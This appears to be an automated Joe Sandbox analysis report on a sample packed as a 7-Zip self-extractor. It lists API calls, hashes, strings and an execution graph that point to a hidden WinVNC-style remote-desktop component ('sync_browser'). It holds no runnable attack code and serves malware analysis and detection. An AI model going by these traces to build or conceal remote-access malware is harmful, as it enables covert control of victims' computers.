                                                                      • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                      • Opcode Fuzzy Hash: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
                                                                      • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                      APIs
                                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFontIndirectItemMessageObjectSend
                                                                      • String ID:
                                                                      • API String ID: 2001801573-0
                                                                      • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                      • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                      • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                      • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00401D92
                                                                      • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ClientScreen$ParentRectWindow
                                                                      • String ID:
                                                                      • API String ID: 2099118873-0
                                                                      • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                      • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                      • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                      • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: (nA${D@
                                                                      • API String ID: 613200358-2741945119
                                                                      • Opcode ID: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                                      • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                      • Opcode Fuzzy Hash: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                                      • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                      APIs
                                                                        • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                        • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                        • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                        • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$??3@$memmove
                                                                      • String ID: {D@
                                                                      • API String ID: 4294387087-1160549682
                                                                      • Opcode ID: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                                      • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                      • Opcode Fuzzy Hash: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                                      • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: _wtol
                                                                      • String ID: GUIFlags$^L@
                                                                      • API String ID: 2131799477-2609156739
                                                                      • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                      • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                      • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                      • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@wsprintf
                                                                      • String ID: (%d%s)
                                                                      • API String ID: 3815514257-2087557067
                                                                      • Opcode ID: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                                      • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                      • Opcode Fuzzy Hash: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                                      • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow$Length
                                                                      • String ID: t1@
                                                                      • API String ID: 1006428111-473456572
                                                                      • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                      • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                      • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                      • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                      APIs
                                                                      • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: 7-Zip SFX$Could not allocate memory
                                                                      • API String ID: 2030045667-3806377612
                                                                      • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                      • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                      • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                      • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:23.2%
                                                                      Total number of Nodes:1068
                                                                      Total number of Limit Nodes:28
execution_graph
22635->22634 22637 7ff7e50d9fdc 22636->22637 22638 7ff7e50d9f28 22636->22638 22640 7ff7e50d9f3b 22637->22640 22641 7ff7e50d9fec 22637->22641 22638->22637 22639 7ff7e50d9f30 GetProcessWindowStation 22638->22639 22639->22640 22642 7ff7e50d9f47 GetUserObjectInformationA GetLastError SetLastError 22639->22642 22647 7ff7e5073730 _RunAllParam 89 API calls 22640->22647 22665 7ff7e50d9d80 22641->22665 22645 7ff7e50d9fae 22642->22645 22646 7ff7e50d9f79 RevertToSelf 22642->22646 22645->22637 22651 7ff7e50d9fb7 22645->22651 22650 7ff7e5073730 _RunAllParam 89 API calls 22646->22650 22652 7ff7e50da0a9 22647->22652 22648 7ff7e50da000 GetUserNameA 22649 7ff7e50da06f 22648->22649 22653 7ff7e50da012 GetLastError 22648->22653 22655 7ff7e5073730 _RunAllParam 89 API calls 22649->22655 22654 7ff7e50d9fa1 22650->22654 22656 7ff7e5073730 _RunAllParam 89 API calls 22651->22656 22652->22612 22657 7ff7e50da044 GetLastError 22653->22657 22658 7ff7e50da01f 22653->22658 22654->22612 22659 7ff7e50da087 22655->22659 22660 7ff7e50d9fcc 22656->22660 22662 7ff7e5073730 _RunAllParam 89 API calls 22657->22662 22661 7ff7e5073730 _RunAllParam 89 API calls 22658->22661 22659->22612 22660->22612 22663 7ff7e50da034 22661->22663 22664 7ff7e50da062 22662->22664 22663->22612 22664->22612 22666 7ff7e50d9bc0 84 API calls 22665->22666 22667 7ff7e50d9da3 22666->22667 22668 7ff7e50d9dae OpenProcess OpenProcessToken 22667->22668 22669 7ff7e50d9da7 22667->22669 22670 7ff7e50d9de0 22668->22670 22671 7ff7e50d9de7 GetTokenInformation 22668->22671 22675 7ff7e5127220 _getdrive 8 API calls 22669->22675 22672 7ff7e50d9eb7 CloseHandle 22670->22672 22673 7ff7e50d9e16 LookupAccountSidA CloseHandle CloseHandle 22671->22673 22674 7ff7e50d9ea9 CloseHandle 22671->22674 22672->22669 22673->22669 22674->22672 22676 7ff7e50d9eda 22675->22676 22676->22648 22676->22649 22678 7ff7e5129731 22677->22678 22679 7ff7e512970d 22677->22679 22679->22678 22680 7ff7e512ffc8 _errno 70 API calls 22679->22680 22681 7ff7e5129717 22680->22681 22682 
7ff7e51349d4 _invalid_parameter_noinfo 17 API calls 22681->22682 22683 7ff7e5129722 22682->22683 22683->22628 23203 7ff7e507d560 19 API calls 2 library calls 23204 7ff7e5080760 95 API calls free 23205 7ff7e509f790 96 API calls 2 library calls 23206 7ff7e5099390 121 API calls _RunAllParam 23208 7ff7e5088190 125 API calls _RunAllParam 23209 7ff7e507d790 11 API calls _getdrive 23211 7ff7e5074790 DeleteCriticalSection 23212 7ff7e509e780 97 API calls __wtomb_environ 23213 7ff7e508dd80 121 API calls 23214 7ff7e508bb80 122 API calls 2 library calls 23216 7ff7e507cf80 120 API calls 4 library calls 23217 7ff7e507f780 71 API calls __wtomb_environ 23219 7ff7e5094003 210 API calls 2 library calls 23220 7ff7e509a9b0 114 API calls _getdrive 23221 7ff7e509ebb0 71 API calls 23223 7ff7e50905b0 168 API calls _RunAllParam 23224 7ff7e50781ad 272 API calls 2 library calls 23226 7ff7e512e9bc 81 API calls 2 library calls 23227 7ff7e507ffb0 SetRectRgn SetRectRgn SetRectRgn 23228 7ff7e50a13a0 7 API calls 23229 7ff7e5089ba0 SetEvent Sleep Sleep 23232 7ff7e5094003 244 API calls 3 library calls 22318 7ff7e508f7d0 22319 7ff7e508f803 22318->22319 22320 7ff7e508f80d 22318->22320 22324 7ff7e50984f0 22319->22324 22327 7ff7e5107a70 6 API calls 22320->22327 22328 7ff7e5098590 22324->22328 22329 7ff7e5073730 _RunAllParam 89 API calls 22328->22329 22330 7ff7e50985d2 22329->22330 22331 7ff7e5098628 22330->22331 22332 7ff7e5098612 22330->22332 22333 7ff7e50985eb SendMessageA WaitForSingleObject 22330->22333 22334 7ff7e5098656 22331->22334 22335 7ff7e5128bf4 free 70 API calls 22331->22335 22332->22331 22358 7ff7e5084110 22332->22358 22333->22332 22336 7ff7e5073730 _RunAllParam 89 API calls 22334->22336 22337 7ff7e509867e _RunAllParam 22334->22337 22335->22334 22336->22337 22338 7ff7e5098757 22337->22338 22361 7ff7e50da220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22337->22361 22339 7ff7e5098768 22338->22339 22340 7ff7e5128bf4 free 70 API calls 22338->22340 22341 7ff7e5098779 22339->22341 
22343 7ff7e5128bf4 free 70 API calls 22339->22343 22340->22339 22344 7ff7e50987b5 FreeLibrary 22341->22344 22348 7ff7e50987bc _RunAllParam 22341->22348 22343->22341 22344->22348 22345 7ff7e509873b 22345->22338 22346 7ff7e5098740 SendMessageA 22345->22346 22346->22338 22347 7ff7e50987ea DeleteObject 22349 7ff7e5128bf4 free 70 API calls 22347->22349 22348->22347 22350 7ff7e509881c DeleteObject 22349->22350 22351 7ff7e5128bf4 free 70 API calls 22350->22351 22352 7ff7e5098844 DeleteObject 22351->22352 22353 7ff7e5128bf4 free 70 API calls 22352->22353 22354 7ff7e509885d DeleteObject 22353->22354 22355 7ff7e5128bf4 free 70 API calls 22354->22355 22356 7ff7e5098876 22355->22356 22362 7ff7e5084140 22358->22362 22360 7ff7e5084124 22360->22331 22361->22345 22363 7ff7e508415c _RunAllParam 22362->22363 22364 7ff7e50841c6 22363->22364 22365 7ff7e50841b4 SendMessageA 22363->22365 22366 7ff7e50841d5 22364->22366 22367 7ff7e50841cf FreeLibrary 22364->22367 22365->22364 22366->22360 22367->22366 23233 7ff7e508b3d0 96 API calls 2 library calls 23234 7ff7e5094003 207 API calls 2 library calls 23235 7ff7e50c7bd0 21 API calls _getdrive 23236 7ff7e5094003 198 API calls 2 library calls 23237 7ff7e507f7d0 DeleteObject 23239 7ff7e5081bd0 FreeLibrary 23240 7ff7e50755d0 72 API calls sprintf 22473 7ff7e50dcbc0 22474 7ff7e50dcbdc socket 22473->22474 22475 7ff7e50dcbd7 22473->22475 22477 7ff7e50dcbf3 22474->22477 22478 7ff7e50dcbfb setsockopt 22474->22478 22482 7ff7e50dcc40 22475->22482 22478->22477 22479 7ff7e50dcc20 22478->22479 22480 7ff7e50dcf90 14 API calls 22479->22480 22481 7ff7e50dcc28 22480->22481 22483 7ff7e50dcc4f 22482->22483 22484 7ff7e50dcc87 22482->22484 22485 7ff7e5073730 _RunAllParam 89 API calls 22483->22485 22484->22474 22486 7ff7e50dcc67 shutdown closesocket 22485->22486 22486->22484 23244 7ff7e5094003 225 API calls 3 library calls 23246 7ff7e5094003 239 API calls 2 library calls 23247 7ff7e50755c0 LeaveCriticalSection 23248 7ff7e50747c0 12 API calls 23249 7ff7e509dbf0 13 
API calls _RunAllParam 23250 7ff7e509ebf0 141 API calls 2 library calls 23251 7ff7e50779e9 75 API calls 3 library calls 23252 7ff7e50765f1 8 API calls _getdrive 23254 7ff7e50803f0 CombineRgn 23255 7ff7e50989e0 93 API calls _RunAllParam 23256 7ff7e508dde0 152 API calls 23260 7ff7e50809e0 82 API calls 2 library calls 23261 7ff7e5083be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 22368 7ff7e508e610 22369 7ff7e51292a4 __wtomb_environ 70 API calls 22368->22369 22370 7ff7e508e67f CreateRectRgn 22369->22370 22371 7ff7e51292a4 __wtomb_environ 70 API calls 22370->22371 22372 7ff7e508e6a3 CreateRectRgn 22371->22372 22373 7ff7e51292a4 __wtomb_environ 70 API calls 22372->22373 22374 7ff7e508e6c7 CreateRectRgn 22373->22374 22375 7ff7e5073730 _RunAllParam 89 API calls 22374->22375 22415 7ff7e508e70a _RunAllParam 22375->22415 22376 7ff7e508f70d 22377 7ff7e5073730 _RunAllParam 89 API calls 22376->22377 22378 7ff7e508f725 22377->22378 22380 7ff7e5073730 _RunAllParam 89 API calls 22378->22380 22379 7ff7e508e740 Sleep 22381 7ff7e508e752 22379->22381 22382 7ff7e508f741 DeleteObject 22380->22382 22381->22379 22381->22415 22422 7ff7e508f6b8 SetRectRgn 22381->22422 22424 7ff7e508f6da LeaveCriticalSection Sleep 22381->22424 22384 7ff7e5128bf4 free 70 API calls 22382->22384 22383 7ff7e508e773 EnterCriticalSection 22383->22415 22385 7ff7e508f760 DeleteObject 22384->22385 22386 7ff7e5128bf4 free 70 API calls 22385->22386 22388 7ff7e508f773 DeleteObject 22386->22388 22387 7ff7e508eab4 DeleteObject 22389 7ff7e5128bf4 free 70 API calls 22387->22389 22392 7ff7e5128bf4 free 70 API calls 22388->22392 22389->22415 22390 7ff7e508ead7 DeleteObject 22393 7ff7e5128bf4 free 70 API calls 22390->22393 22391 7ff7e508e8cb DeleteObject 22394 7ff7e5128bf4 free 70 API calls 22391->22394 22398 7ff7e508f786 22392->22398 22393->22415 22394->22415 22395 7ff7e508eafa DeleteObject 22401 7ff7e5128bf4 free 70 API calls 22395->22401 22396 7ff7e508e8ee DeleteObject 22402 7ff7e5128bf4 free 70 API 
calls 22396->22402 22399 7ff7e5127220 _getdrive 8 API calls 22398->22399 22405 7ff7e508f7a2 22399->22405 22401->22415 22402->22415 22403 7ff7e508e9a6 GetRgnBox 22403->22415 22404 7ff7e508e911 DeleteObject 22407 7ff7e5128bf4 free 70 API calls 22404->22407 22406 7ff7e508e7e6 GetRgnBox 22406->22415 22407->22415 22408 7ff7e508f704 LeaveCriticalSection 22408->22376 22409 7ff7e51075c0 104 API calls 22409->22415 22410 7ff7e5107400 97 API calls 22410->22415 22412 7ff7e508e9f3 GetRgnBox 22412->22415 22414 7ff7e508e833 GetRgnBox 22414->22415 22415->22376 22415->22379 22415->22381 22415->22383 22415->22387 22415->22390 22415->22391 22415->22395 22415->22396 22415->22404 22415->22408 22415->22409 22415->22410 22416 7ff7e50dd440 16 API calls 22415->22416 22417 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22417 22415->22422 22428 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22428 22430 7ff7e508f60b GetTickCount 22415->22430 22432 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22432 22433 7ff7e5073730 89 API calls _RunAllParam 22415->22433 22442 7ff7e50dd710 15 API calls 22415->22442 22443 7ff7e50dcc40 91 API calls 22415->22443 22445 7ff7e507f840 73 API calls __wtomb_environ 22415->22445 22446 7ff7e507f840 73 API calls __wtomb_environ 22415->22446 22447 7ff7e507f840 73 API calls __wtomb_environ 22415->22447 22448 7ff7e507f840 73 API calls __wtomb_environ 22415->22448 22449 7ff7e507f840 73 API calls __wtomb_environ 22415->22449 22450 7ff7e507f840 73 API calls __wtomb_environ 22415->22450 22452 7ff7e50dd600 14 API calls 22415->22452 22453 7ff7e50dded0 8 API calls 2 library calls 22415->22453 22454 7ff7e509a580 99 API calls _RunAllParam 22415->22454 22416->22415 22419 7ff7e508ebb3 CreateRectRgn CombineRgn 22417->22419 22427 7ff7e508ec05 22419->22427 22420 7ff7e508ea40 GetRgnBox 22420->22415 22422->22424 22424->22415 22426 7ff7e508f702 22424->22426 22425 7ff7e508e87c GetRgnBox 22425->22415 22426->22376 22429 7ff7e508ec20 SetEvent 22427->22429 22451 7ff7e5098e00 120 API 
calls 22427->22451 22431 7ff7e508efdf CreateRectRgn CombineRgn DeleteObject 22428->22431 22429->22427 22435 7ff7e50ddd90 11 API calls 22430->22435 22436 7ff7e5128bf4 free 70 API calls 22431->22436 22437 7ff7e508f120 CreateRectRgn CombineRgn DeleteObject 22432->22437 22433->22415 22435->22381 22436->22415 22440 7ff7e5128bf4 free 70 API calls 22437->22440 22438 7ff7e508ec4a DeleteObject 22441 7ff7e5128bf4 free 70 API calls 22438->22441 22440->22415 22441->22415 22442->22415 22443->22415 22445->22406 22446->22414 22447->22425 22448->22403 22449->22412 22450->22420 22451->22438 22452->22415 22453->22415 22454->22415 23262 7ff7e508da10 82 API calls 2 library calls 23263 7ff7e50c7e10 20 API calls _getdrive 23267 7ff7e5080010 74 API calls free 23268 7ff7e5083210 18 API calls _getdrive 23270 7ff7e5084c10 137 API calls 4 library calls 23272 7ff7e50a3600 9 API calls _getdrive 23273 7ff7e50a5000 71 API calls free 23276 7ff7e5085203 16 API calls _getdrive 23278 7ff7e5080e00 82 API calls 3 library calls 23279 7ff7e507a600 100 API calls _RunAllParam 23282 7ff7e5071000 70 API calls free 23284 7ff7e5074200 121 API calls 2 library calls

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                      • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                      • API String ID: 459429253-3399855497

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                      • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                      • API String ID: 1881659197-3751679782

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF7E50DA094
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF7E50D9F3B
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF7E50D9F7F
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF7E50DA01F
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF7E50D9FB7
                                                                      • vncservice.cpp : getusername error %d, xrefs: 00007FF7E50DA04A
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF7E50DA06F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
